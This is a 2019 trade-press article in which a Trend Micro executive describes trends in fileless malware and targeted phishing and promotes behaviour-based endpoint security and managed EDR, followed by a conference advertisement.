Security Market Segment LS
Tuesday, 05 March 2019 17:05

Time to review endpoint security: Trend Micro exec

By
Trend Micro global vice-president of market strategy Eric Skinner Trend Micro global vice-president of market strategy Eric Skinner

Changes in the threat landscape mean organisations should take a fresh look at their endpoint security measures, Trend Micro global vice-president of market strategy Eric Skinner has told iTWire.

Fileless malware represents "a rapid evolution in the threat landscape" and its incidence increased by 819% between August 2017 and December 2018, Skinner observed.

One reason for the rapid increase in fileless malware was because most organisations had managed to get ransomware under control, so "the attackers have shifted to something new".

The technique generally involves using legitimate software such as PowerShell to perform unauthorised actions on victim systems. This makes it effectively invisible to older types of endpoint security software, he said.

Endpoint security was a "sleepy space" around five years ago, he said, and some administrators had got into the habit of disabling the advanced features of their security software.

But simply scanning files is not going to be effective against fileless malware, so endpoint security software needs to look at the way the system is behaving. For example, is PowerShell being launched by another application? Is there an unusual pattern of memory activity?

This means administrators need to ensure that their incumbent security product is being used to its full potential, said Skinner, and to consider other options if they are using a product that isn't up to the job in 2019.

Email is currently the most common method of launching attacks, and while Trend Micro says the traditional shotgun approach (blasting an email to millions of addresses in the hope that even a small percentage of recipients will be taken in) is still in use and relatively easy to spot, carefully targeted emails are being used for spearphishing and BEC (business email compromise) attacks.

In both cases, the messages show a good command of English, address the recipient by name, and indicate a degree of research (eg, using information drawn from sites such as LinkedIn), Skinner said.

Around a year ago, Trend Micro introduced Writing Style DNA to help determine how likely it is that a particular email actually originated from the apparent sender.

More recently, it has begun rendering the destination pages of the links in an email and applying machine vision to the resulting image to help detect spoofed login pages designed to steal the victim's credentials (phishing). The advantage of this approach is that it doesn't require knowledge of domains used for phishing: if the page resembles (say) the Office 365 login page but isn't part of the relevant Microsoft domain(s), then it is highly suspicious.

Ideally, email-borne threats should be detected before they are delivered. But the growing tendency for people to work off-site (at clients' premises, at home or in cafes, for example) coupled with the use of personal email accounts, means that the software on the device must be kept up-to-date (or at least subject to virtual patching) and equipped with endpoint security software that is capable of detecting and blocking relevant threats when the organisation's servers and firewalls haven't had the opportunity to inspect the traffic.

"The endpoint has to defend itself," Skinner said.

Another consideration is the requirement to adequately report data breaches. While older endpoint products lack forensic capabilities, newer products incorporate (often as an optional extra) endpoint detection and response technology, providing customers with an investigative toolset that can, for example, show where malware came from, whether or not it was blocked before it could take any action, which files (if any) were accessed by the malware, and whether any data was exfiltrated.

In addition, Trend Micro offers managed EDR. Unlike incident response services, managed EDR is an ongoing service that reports any detected improper activity and identifies when data breaches have occurred.

Trend Micro's cloud-based platform uses a variety of techniques including machine learning to process telemetry data from customers' systems before bringing exceptions to the attention of the company's international team of security analysts. This scale and automation means the service is "eminently affordable", he said.

With all these issues in mind, it is really important that organisations refresh their approach to endpoint security, whether they choose to stay with their incumbent vendor or move to a new provider, Skinner said.

CHIEF DATA & ANALYTICS OFFICER BRISBANE 2020

26-27 February 2020 | Hilton Brisbane

Connecting the region’s leading data analytics professionals to drive and inspire your future strategy

Leading the data analytics division has never been easy, but now the challenge is on to remain ahead of the competition and reap the massive rewards as a strategic executive.

Do you want to leverage data governance as an enabler?Are you working at driving AI/ML implementation?

Want to stay abreast of data privacy and AI ethics requirements? Are you working hard to push predictive analytics to the limits?

With so much to keep on top of in such a rapidly changing technology space, collaboration is key to success. You don't need to struggle alone, network and share your struggles as well as your tips for success at CDAO Brisbane.

Discover how your peers have tackled the very same issues you face daily. Network with over 140 of your peers and hear from the leading professionals in your industry. Leverage this community of data and analytics enthusiasts to advance your strategy to the next level.

Download the Agenda to find out more

DOWNLOAD NOW!

Stephen Withers

joomla visitors

Stephen Withers is one of Australia¹s most experienced IT journalists, having begun his career in the days of 8-bit 'microcomputers'. He covers the gamut from gadgets to enterprise systems. In previous lives he has been an academic, a systems programmer, an IT support manager, and an online services manager. Stephen holds an honours degree in Management Sciences and a PhD in Industrial and Business Studies.

VENDOR NEWS & EVENTS

REVIEWS

Recent Comments